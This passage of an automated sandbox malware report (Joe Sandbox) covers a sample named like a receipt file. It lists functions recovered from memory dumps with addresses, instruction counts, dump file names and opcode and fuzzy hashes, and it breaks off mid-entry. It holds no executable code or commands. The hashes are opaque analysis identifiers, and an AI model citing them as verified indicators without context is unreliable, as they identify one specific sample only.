                • Opcode ID: 9effe0ad6c7b864ce82606f1e1fbd3772b1714739cbf95964465c45757b561fa
                • Instruction ID: 67379693ff351fb8ef354203d5b9e108549268456f81188d04b11a343d99d551
                • Opcode Fuzzy Hash: 9effe0ad6c7b864ce82606f1e1fbd3772b1714739cbf95964465c45757b561fa
                • Instruction Fuzzy Hash: B711AC749142599FCB19DFA8DA90ADDBFF2BF48310F24856AE850B3291CB354E40CF51
                Function 06862CFC Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eeb4e64c42967e1f5a67bc6e68b131307f749dabd0176452d0c3bde6f86a6cab
                • Instruction ID: a4d630cdf1911e45e9fa1d5b6e24927266fe716566440784cd50976182361904
                • Opcode Fuzzy Hash: eeb4e64c42967e1f5a67bc6e68b131307f749dabd0176452d0c3bde6f86a6cab
                • Instruction Fuzzy Hash: 5811FB34A04209EFDB45CF98D494E9DFBB2FF48314F288199E405AB365C775E986CB80
                Function 08508598 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b53108605f4b89f07c824fc3b6819f8afa711f6e705e0e1dd8970c58148e22ab
                • Instruction ID: 2c004fb5b862b8261eea3210e4359f633140cc10d7b9cc04f9e1ab79079b6e02
                • Opcode Fuzzy Hash: b53108605f4b89f07c824fc3b6819f8afa711f6e705e0e1dd8970c58148e22ab
                • Instruction Fuzzy Hash: 2201D3753002049FC714DF2DD884E5ABBE9FF8822171645AAE505CB372DB71EC45CB90
                Function 06869AA4 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0b1fd669ca589e9255b56b3d231ec0e1c1acac2c8751a8a8670455162a2f7b74
                • Instruction ID: 848417a3c54b8b9554506dae87b277cd02282730c7437c8a2f35f539f4f2187c
                • Opcode Fuzzy Hash: 0b1fd669ca589e9255b56b3d231ec0e1c1acac2c8751a8a8670455162a2f7b74
                • Instruction Fuzzy Hash: 7911F534E01209EFDB45CBA8D584A9DFBF2AF88314F24C159E405AB3A5C775ED86CB80
                Function 06C743B8 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21659caa1d8ce9c3b67515133b09466ab08f28f32a59be6e5a4653b1bc3a3a27
                • Instruction ID: 9f5f02ea08e3c7d80ff69cc1f791c6c395e6af6d527d5f8626c93c957f14552c
                • Opcode Fuzzy Hash: 21659caa1d8ce9c3b67515133b09466ab08f28f32a59be6e5a4653b1bc3a3a27
                • Instruction Fuzzy Hash: FAF0CD337042296B5B54EA5EEC80DBFB7EEFBC8620714812EF618C3240EB31D90597A0
                Function 06C73E14 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 95ac0f00866afff34aaee728a2ea8e189c0be363df5814ca01510005e9d6192c
                • Instruction ID: 3d78cad5da0d115c7aa1aaf1f1a008aec2f33fc2c471ba416fe1c9dc4f5668f5
                • Opcode Fuzzy Hash: 95ac0f00866afff34aaee728a2ea8e189c0be363df5814ca01510005e9d6192c
                • Instruction Fuzzy Hash: C811F534E05249EFDB45CBA8D584A9DFBF2AF88304F24C159E409AB365C771ED86CB80
                Function 06C77D48 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0606f8ac20a2c7deb946537dec7caf865409d60f529855d8645548fbbeba0942
                • Instruction ID: d34e7e8fc459cf75d2f21c2d9ca393d7e952ec27a0651356d5acc45344a71fae
                • Opcode Fuzzy Hash: 0606f8ac20a2c7deb946537dec7caf865409d60f529855d8645548fbbeba0942
                • Instruction Fuzzy Hash: D4F0C2327042196F5B50EA6AEC40DBFB7EFFBD8220314812EF618C7340EA71D90187A4
                Function 06C79B74 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e72656e4c74ec6ffc85ccc933cb6c394a1c963f0ceba826d07bcea608b3b9223
                • Instruction ID: f7351701702e65e0c681902ea367709dccfa48e14aa1b54d76de57610449d624
                • Opcode Fuzzy Hash: e72656e4c74ec6ffc85ccc933cb6c394a1c963f0ceba826d07bcea608b3b9223
                • Instruction Fuzzy Hash: 4311D234A01209EFDB45CBA8D584A9DFBB2AF88314F24C159E405AB365C775ED86CB90
                Function 008BD745 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2121825089.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8bd000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ef2673dff7df887fa5303ee423bcc020782baba7cbbf2b55c6f1855a1e1a3852
                • Instruction ID: 3dd5160c6fc1eb9b9c983513b2734db1de2d094b94305d6e55e57210b835710a
                • Opcode Fuzzy Hash: ef2673dff7df887fa5303ee423bcc020782baba7cbbf2b55c6f1855a1e1a3852
                • Instruction Fuzzy Hash: 1001F731005344AAE7208A16CD84BE6BF9CFF45324F18C52AED088A386EA399800CA79
                Function 06C72DE0 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45ce5e0522136805584dba214edc986dabb5fd7148406cadc1b2ff35c2af637e
                • Instruction ID: 03c00f3116f408bcba9b5ae35f4deed88f63e2eb988d86b245c04fc22d3c7b2c
                • Opcode Fuzzy Hash: 45ce5e0522136805584dba214edc986dabb5fd7148406cadc1b2ff35c2af637e
                • Instruction Fuzzy Hash: CF014F312046509FC7548F2DD844C16B7F9FF89220315069EF19AC7772C635EE418B54
                Function 06882F40 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9af4424bd14b7e6e05a76e2028ac4c376b552b903d20d3daa575c10fa1d663dd
                • Instruction ID: 8542f9004efea56dcfb7d14cbb8b40a47af58141fc827e6e902cc86d5bc26dfd
                • Opcode Fuzzy Hash: 9af4424bd14b7e6e05a76e2028ac4c376b552b903d20d3daa575c10fa1d663dd
                • Instruction Fuzzy Hash: 6401D2312406059FC715DF29E940D8BBBE9EF843507008A29E54A87635EB70FD09CB91
                Function 0686B9D1 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9f0ffa6c1dac950f5818124c91a4589fb2c0c87c370ade5e6848a2363d1dd236
                • Instruction ID: c8a73793c2ee0765cc358aea2021ad56a499e4a4202de8cd491a2ec6ad4da1ed
                • Opcode Fuzzy Hash: 9f0ffa6c1dac950f5818124c91a4589fb2c0c87c370ade5e6848a2363d1dd236
                • Instruction Fuzzy Hash: 6C113970A01209EFDB45CFA5D485BADBFB2AF88318F248059E405EB361CB759992CF80
                Function 06C7C258 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 533c5b05690faeddbe4ad6947c9617f9da3b1e320106d2e082a42ec908581249
                • Instruction ID: f6e4f1dba0d8e87f27d9a90f7342928c35157373a0c2ba7c8665691d4dcf8c3f
                • Opcode Fuzzy Hash: 533c5b05690faeddbe4ad6947c9617f9da3b1e320106d2e082a42ec908581249
                • Instruction Fuzzy Hash: 0F018C70D0020A8FDB44EFA9D8057AEBBB0AF48304F104529D815F73A0EB789646DBD1
                Function 0850B960 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a9cd112d1c2d7412c0f84fcb903972ab5575de17a4989ba5069083e9dc27c10
                • Instruction ID: 693a7c63c4587e5eeba83a2d98023721ca5c22440f7df983f7409585c491e30f
                • Opcode Fuzzy Hash: 7a9cd112d1c2d7412c0f84fcb903972ab5575de17a4989ba5069083e9dc27c10
                • Instruction Fuzzy Hash: 8D013974904259ABCB04CF99D954ADDBFF2BF88310F108029E801B7290CB715E00CF61
                Function 08507588 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: da1f441e85d2b90cbeff5fd6f1657fa4024f0105a32c69e6dfe985a3014592f7
                • Instruction ID: 12355b65234669eff17d8b9e0a7f3588631c939903ebc5f8ac3cf126170790a0
                • Opcode Fuzzy Hash: da1f441e85d2b90cbeff5fd6f1657fa4024f0105a32c69e6dfe985a3014592f7
                • Instruction Fuzzy Hash: 98018174601712CFD7298A3DD5046B7B7EABF892077148C7DD48286698DB76F881CF90
                Function 06C73A3B Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dfaa44e59466298501ca5ccb5a3c2bb71bb0140d308ce67a7d3355a1420b5d4
                • Instruction ID: c2950e69b08bd41176a644a267ecf5275f8a77abaf7c3c6451ac297a87663b38
                • Opcode Fuzzy Hash: 7dfaa44e59466298501ca5ccb5a3c2bb71bb0140d308ce67a7d3355a1420b5d4
                • Instruction Fuzzy Hash: 24017179A12108DFCB05DF98D945EEDB7B1FB88314F04806AE805A73A0C7359A16DB50
                Function 0688AE00 Relevance: .0, Instructions: 41COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 737873e16497d3e2317ad82ecb933c8a7878b7e24070e58b88e22b0c0790d5bb
                • Instruction ID: a4c3d5589945f7a047de33114e0ec2c30deaa5ee5aa0592250870be380a4de26
                • Opcode Fuzzy Hash: 737873e16497d3e2317ad82ecb933c8a7878b7e24070e58b88e22b0c0790d5bb
                • Instruction Fuzzy Hash: FFF05436B582258F9B5CAFA8B4044AE7BE9EB4417671444BFE20DCB291EE31D841C794
                Function 0850DA60 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a88a04b01eda82cfb87a467db0d502bda2c49bf32d73aa7f41b08776b8e66f1
                • Instruction ID: 7670337fb831ae6561ec18c54e72433706e1c496d309924dc3baf58a492d9582
                • Opcode Fuzzy Hash: 6a88a04b01eda82cfb87a467db0d502bda2c49bf32d73aa7f41b08776b8e66f1
                • Instruction Fuzzy Hash: 53F044727081469FC705CF6DD844A96BFF5FF49360B0581BAE508CB262DA71DC41CB50
                Function 06C7A6F0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85b5546d202e5e769d4d106bde89791303050112f2caef61453127e97dcdcae6
                • Instruction ID: d12fa3438a94dde6e7e627d63764bb3275402235ae974b2324ca4cf6cfef3887
                • Opcode Fuzzy Hash: 85b5546d202e5e769d4d106bde89791303050112f2caef61453127e97dcdcae6
                • Instruction Fuzzy Hash: 85F0F4319006549FC711EB79D880CDEBFB4EF86310B0101ABD58197321D6315A0ACBA2
                Function 0850ED4F Relevance: .0, Instructions: 38COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 11af1354fc247c09f32dd7884dfd42f085ce13a0d21f152271127ba0a27cbc21
                • Instruction ID: 7ac329dba3e4a51fe6822efb05a1f7a3dbf821da6c3626d1abee2bb917853912
                • Opcode Fuzzy Hash: 11af1354fc247c09f32dd7884dfd42f085ce13a0d21f152271127ba0a27cbc21
                • Instruction Fuzzy Hash: 95F0303A7506118FC748DB3DD55845977E7EFC929532980B9E60ACB3B5EE74DC028B40
                Function 06C72F59 Relevance: .0, Instructions: 38COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0970d6eac1b98e92a6552876098a5a0032d8089c2088d161d1a3fab7eb3c932
                • Instruction ID: 21472b1cbe0a876ad41a91cc4137e6444347e2f396af279cb9b8177199ab9711
                • Opcode Fuzzy Hash: e0970d6eac1b98e92a6552876098a5a0032d8089c2088d161d1a3fab7eb3c932
                • Instruction Fuzzy Hash: D8F09035304650AFC744DB2CD884D2A7BE9FF8E62471142AAF549CB7A2CA65DC01CB91
                Function 0850ED60 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c473d438e6a8f91bcf2316a14bc6700c2efb383d0e9a3b128251d12b5fcdd6a8
                • Instruction ID: 2f9953dea37d94c3526911c62074c940b02c66e22536dcf4dca4e40267d32bd9
                • Opcode Fuzzy Hash: c473d438e6a8f91bcf2316a14bc6700c2efb383d0e9a3b128251d12b5fcdd6a8
                • Instruction Fuzzy Hash: 19F05E393106108FC748DB3ED45886977EAEFCD66131980B9E606CB370EEB0DC028A50
                Function 06868EE9 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ca47c2e919ab880b9625914e6a46e4aa8b9c90b0cce4f3fcdb7e40a043a694f
                • Instruction ID: 91f1b8b2d8f8a50d112d7042ea043370a76ec3ab86d30707ef9c5632575082af
                • Opcode Fuzzy Hash: 0ca47c2e919ab880b9625914e6a46e4aa8b9c90b0cce4f3fcdb7e40a043a694f
                • Instruction Fuzzy Hash: 4EF027712093565FDB250EA6684447A7FF9DF842A030405AFFAC9C7182CAA48C45C7F1
                Function 008BD744 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2121825089.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8bd000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d7d9a3cbc3e2a57b8e4b8910d83f90cba2df7674ab901aad4cdb2681e7edadb
                • Instruction ID: 2762a444a76758135d638dc1fa2e64a65b74893ae6965f2bd3d52b96950d1db7
                • Opcode Fuzzy Hash: 0d7d9a3cbc3e2a57b8e4b8910d83f90cba2df7674ab901aad4cdb2681e7edadb
                • Instruction Fuzzy Hash: 2FF06271405344AAE7108E16C888BA2FF98EF95734F18C55AED484B386D6799C44CBB5
                Function 06C77FB0 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 216fa04494d73fb30cf9afdaa147b4dca3f8edf4e992fb90e3a49477ccbef0b4
                • Instruction ID: 1ec21d1eccc1ba5e1e5264ec40e90bdd1a9a69f801ed8a8a71b6af8edd015e29
                • Opcode Fuzzy Hash: 216fa04494d73fb30cf9afdaa147b4dca3f8edf4e992fb90e3a49477ccbef0b4
                • Instruction Fuzzy Hash: B5F0E9721087929FC3128B3858455E7FFE3EF96220B19459FD1D692552CB145892C781
                Function 06886AC8 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7c286e31d02c2c8ea6892f93b8d953ef19e16c6d7e820e700722bd806f69ea5f
                • Instruction ID: 890131e533f12195be5f2b67c394a70203e43913d98a1e648fa71aa2c4bc4edd
                • Opcode Fuzzy Hash: 7c286e31d02c2c8ea6892f93b8d953ef19e16c6d7e820e700722bd806f69ea5f
                • Instruction Fuzzy Hash: A9F0E270B041049FCB84DB7CE80062EB7E9EF8921571086ECF90DC7351EA32DC018782
                Function 08508F20 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c74bf67480ddb8db7c3e09d0998047fb74f6da6475d527ba890a52dbb4b7c49c
                • Instruction ID: 17bcb51884a7d58e378dd19ee61cda469f9e54d8bdb993ede181ec4e11493f25
                • Opcode Fuzzy Hash: c74bf67480ddb8db7c3e09d0998047fb74f6da6475d527ba890a52dbb4b7c49c
                • Instruction Fuzzy Hash: CDF037722041E83F9B525E9A5C10DFF7FEDDA8E161B084056FE98D2242C42DDD619BB0
                Function 068807B9 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba847ee51d3add9c372f42ba5c39798c3d407ad5165927fe8800b1760e0a4859
                • Instruction ID: 2c890defb309829abc574ef02077424b3779f90ae453e8ebcae22e2a9cbd6993
                • Opcode Fuzzy Hash: ba847ee51d3add9c372f42ba5c39798c3d407ad5165927fe8800b1760e0a4859
                • Instruction Fuzzy Hash: 1FF0F0312093809FD3218F25DC44A07BFFAEFC2310B2544AED588CB212D630DC89C760
                Function 06885818 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 045e9c6df58f24e75c426e947138dfb2045a68a315b71e325a88d16ef49cde59
                • Instruction ID: d977d06e71ba647274d12f2edc03d882e54d87719b26006eeb79c0060fb565ce
                • Opcode Fuzzy Hash: 045e9c6df58f24e75c426e947138dfb2045a68a315b71e325a88d16ef49cde59
                • Instruction Fuzzy Hash: 47F090B1A046159FD744EFA9D8459AFBBFAFF84310B40893AE119D7251DB70AC04C7A0
                Function 06860E3B Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6fea9037fc46257d65f62898d667759b839f57d17bab9ddb5c0ead8672bd488d
                • Instruction ID: 720a0c8c05fa96a623e06e050953640895f4f9fbfe1481116a861a25be893481
                • Opcode Fuzzy Hash: 6fea9037fc46257d65f62898d667759b839f57d17bab9ddb5c0ead8672bd488d
                • Instruction Fuzzy Hash: B3014F35A0635ADFCB01CF64D6419AEBBB5FF48315F2086A5E449EB216C330AD95CBD0
                Function 06860E39 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d424d63eb549b27b86c49d414a6b2111344f7f94548851b3f0c32b970660849d
                • Instruction ID: a4ec632ace6292e3e52e2a3f5c0b56ea145e2e50fdb70d3bb6ca91ef7c54c44d
                • Opcode Fuzzy Hash: d424d63eb549b27b86c49d414a6b2111344f7f94548851b3f0c32b970660849d
                • Instruction Fuzzy Hash: A6011975A0121ACFCB14CF64D6849AEBBB1FF48315B2046A4E909AB325D331ED91CB90
                Function 06C72F68 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6be638cac949a6b9cd999f68cd6a975404a54c06a8924f7634375a3d54fda02
                • Instruction ID: 8834784e040cec245a3df1af978d3aefd00219666e37d4bfcde3d9d215a09c06
                • Opcode Fuzzy Hash: a6be638cac949a6b9cd999f68cd6a975404a54c06a8924f7634375a3d54fda02
                • Instruction Fuzzy Hash: 58F01C35310A149FC748D66DD884D2A77EEEB8DB247214165F509CB761CA61EC018B91
                Function 06C7D828 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d570c6511f7f87cc2712ad867003aa12ac346e2cc8265d9c56c7254e962b86b
                • Instruction ID: 32a119c6ef2409e956d03dd0062174e568eb4914cb92ea92f2fdf36ebc8a62b6
                • Opcode Fuzzy Hash: 1d570c6511f7f87cc2712ad867003aa12ac346e2cc8265d9c56c7254e962b86b
                • Instruction Fuzzy Hash: 38F0F075E04308DFCB15CBA4D8409DDBB72EF88305F048099E40597222DA34A952D790
                Function 06862EF0 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b32db7b33f14dd564b543a6e5c5803f777a7d9d95d74173b78662590d9f9e5b
                • Instruction ID: 9b11240eea3a749518d2d67b255ab93e39cb8b0135388f67c2d7cb7bab677d92
                • Opcode Fuzzy Hash: 4b32db7b33f14dd564b543a6e5c5803f777a7d9d95d74173b78662590d9f9e5b
                • Instruction Fuzzy Hash: BEF0A0322097506FCF224A6998008EA7BBBAFD5220308492EF681CA211CAB48C45DBE1
                Function 06867138 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0979c16392caecdc46ea4263c646f9fc425de2db4fb4adb9081812fb601a5675
                • Instruction ID: 713c6ed9f868d84e69923c401bd14e60abef57a9e2c95175b9ee684cfe59f38f
                • Opcode Fuzzy Hash: 0979c16392caecdc46ea4263c646f9fc425de2db4fb4adb9081812fb601a5675
                • Instruction Fuzzy Hash: F5F082322083959FCB178F69989089ABFB6FFDA310319459FF9848B256C635CC52D7A0
                Function 06C78DF9 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 612b997c99e3e673d46222ece62da42cb07de49fa79de7536d2218ae0866581a
                • Instruction ID: a6407616f65e016e7aa9bc1cb8a4895d4104f7e4025c8316e7d14b7201719c23
